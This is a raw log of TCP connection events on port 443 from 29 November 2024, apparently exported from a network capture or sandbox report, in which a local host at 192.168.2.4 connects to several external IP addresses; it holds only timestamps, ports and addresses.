                              Nov 29, 2024 15:58:24.969207048 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:25.009708881 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:25.920269012 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:25.920478106 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:25.920561075 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:25.921710968 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:25.921730995 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:26.316601038 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:26.316657066 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:26.316870928 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:26.316986084 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:26.316998959 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:26.577006102 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:26.623336077 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.113250017 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.113275051 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.113282919 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.113291025 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.113326073 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.113353014 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:27.113384008 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.113399982 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:27.113425970 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:27.134154081 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.134232998 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:27.134237051 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:27.134284019 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:27.409235954 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:27.409305096 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:27.409360886 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:27.915781021 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:27.915832996 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:28.032788038 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.033103943 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.033128977 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.034080982 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.034156084 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.034166098 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.034209013 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.035214901 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.035274029 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.035456896 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.035465002 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.090810061 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.509221077 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.509310007 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.509459019 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.510018110 CET49747443192.168.2.452.217.132.146
                              Nov 29, 2024 15:58:28.510034084 CET4434974752.217.132.146192.168.2.4
                              Nov 29, 2024 15:58:28.741209030 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:28.741280079 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:28.741396904 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:28.741729021 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:28.741741896 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:28.742260933 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:28.742292881 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:28.742360115 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:28.742615938 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:28.742624044 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:28.782454967 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:28.782473087 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:28.782484055 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:28.782488108 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:30.576855898 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.577161074 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.577187061 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.578114033 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.578174114 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.579282045 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.579340935 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.579561949 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.579567909 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.611923933 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.612166882 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.612181902 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.613029957 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.613082886 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.613540888 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.613580942 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.640125990 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.663785934 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:30.663795948 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:30.707077026 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.520812035 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.520946026 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.520992994 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.521001101 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.521045923 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.536494017 CET49750443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.536524057 CET44349750103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.548279047 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.548325062 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.548383951 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.548854113 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.548898935 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.548943996 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.548955917 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.549336910 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.549352884 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.549495935 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:31.549506903 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:31.595330954 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:32.218600988 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:32.218753099 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:32.218811989 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:32.218823910 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:32.218868017 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:32.220038891 CET49751443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:32.220052958 CET44349751103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.386430025 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.390450954 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:33.390476942 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.390856981 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.391680956 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:33.391760111 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.393436909 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:33.433588028 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.433815002 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:33.433829069 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.434137106 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.434578896 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:33.434665918 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.434694052 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:33.439337015 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.479325056 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:33.481662989 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.387053967 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.427534103 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.427567005 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.451355934 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.459933996 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.459943056 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.459989071 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.460006952 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.460035086 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.460055113 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.460495949 CET49753443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.460510969 CET44349753103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.478130102 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.604538918 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:34.604578972 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:34.604646921 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:34.604906082 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:34.604919910 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:34.611242056 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.611298084 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.611358881 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.611495972 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.611507893 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.684628963 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.684638977 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.684701920 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.684720039 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.684732914 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.684739113 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.684768915 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.684786081 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.705382109 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.705452919 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.705463886 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.705554962 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.705893993 CET49754443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.705908060 CET44349754103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.711756945 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.711792946 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.711860895 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.712028027 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.712042093 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.713131905 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.713181019 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:34.713257074 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.713404894 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:34.713422060 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:35.834883928 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:35.880947113 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:35.887964010 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:35.887984991 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:35.889039993 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:35.889103889 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:35.896326065 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:35.896399975 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:35.896456957 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:35.896465063 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:35.944683075 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:36.340748072 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:36.340806007 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:36.340853930 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:36.341708899 CET49756443192.168.2.4104.26.12.205
                              Nov 29, 2024 15:58:36.341736078 CET44349756104.26.12.205192.168.2.4
                              Nov 29, 2024 15:58:36.468760967 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.469001055 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.469028950 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.469934940 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.469990969 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.470504045 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.470562935 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.470643044 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.470648050 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.484029055 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:36.484067917 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:36.484141111 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:36.484317064 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:36.484328032 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:36.522752047 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.629264116 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.629513979 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.629539013 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.629905939 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.630219936 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.630281925 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.630352974 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.636569977 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.636750937 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.636781931 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.637662888 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.637725115 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.638129950 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.638184071 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.638237953 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.638242960 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.675343037 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:36.679013014 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:36.769841909 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:36.769886017 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:36.769952059 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:36.770152092 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:36.770159960 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:37.443654060 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.456048965 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.456058979 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.456091881 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.456115961 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.456132889 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.456137896 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.456182003 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.456687927 CET49758443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.456703901 CET44349758103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.594151974 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.596661091 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.596822023 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.596877098 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.597515106 CET49759443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.597533941 CET44349759103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.647793055 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.647818089 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.694674969 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.726313114 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:37.726557016 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:37.726581097 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:37.727575064 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:37.727643967 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:37.727981091 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:37.728039026 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:37.728125095 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:37.772881985 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:37.772887945 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:37.819725990 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:37.887595892 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.887607098 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.887648106 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.887664080 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.887670994 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.887675047 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.887697935 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.887708902 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.887722969 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.908456087 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.908487082 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.908512115 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:37.908529997 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.908566952 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.908781052 CET49760443192.168.2.4103.160.107.138
                              Nov 29, 2024 15:58:37.908797979 CET44349760103.160.107.138192.168.2.4
                              Nov 29, 2024 15:58:38.195488930 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:38.195568085 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:38.195631981 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:38.196448088 CET49761443192.168.2.4104.26.13.205
                              Nov 29, 2024 15:58:38.196474075 CET44349761104.26.13.205192.168.2.4
                              Nov 29, 2024 15:58:39.128710032 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.129057884 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.129072905 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.130146027 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.130212069 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.131351948 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.131402969 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.131763935 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.131768942 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.179040909 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.695194006 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.695276022 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.695321083 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.696748972 CET49762443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.696762085 CET44349762103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.843059063 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.843094110 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:39.843403101 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.843403101 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:39.843430996 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:41.570324898 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:41.570789099 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:41.570815086 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:41.571722984 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:41.571799994 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:41.572139978 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:41.572191000 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:41.572285891 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:41.572292089 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:41.616096973 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:42.404064894 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:42.404149055 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:58:42.404211998 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:42.404827118 CET49763443192.168.2.4103.126.138.87
                              Nov 29, 2024 15:58:42.404843092 CET44349763103.126.138.87192.168.2.4
                              Nov 29, 2024 15:59:03.896931887 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:59:03.896950960 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:59:05.204561949 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:05.204617023 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:05.204689980 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:05.205041885 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:05.205061913 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:05.974061966 CET49765443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:05.974106073 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:05.974174023 CET49765443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:05.974596024 CET49765443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:05.974606037 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:06.777364969 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:06.777519941 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:06.781183004 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:06.781198025 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:06.781450033 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:06.789962053 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:06.835329056 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.542678118 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.542704105 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.542737007 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.542809963 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:07.542839050 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.542855024 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:07.542876959 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:07.582012892 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.582055092 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.582096100 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.582124949 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:07.582170963 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:07.582353115 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:07.582370996 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.582381010 CET49764443192.168.2.420.12.23.50
                              Nov 29, 2024 15:59:07.582386017 CET4434976420.12.23.50192.168.2.4
                              Nov 29, 2024 15:59:07.950692892 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:07.950772047 CET49765443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:07.958946943 CET49765443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:07.958962917 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:07.959172964 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:07.994586945 CET49765443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:08.039330006 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:08.467628956 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:08.467653990 CET4434976513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:08.467721939 CET49765443192.168.2.413.107.246.63
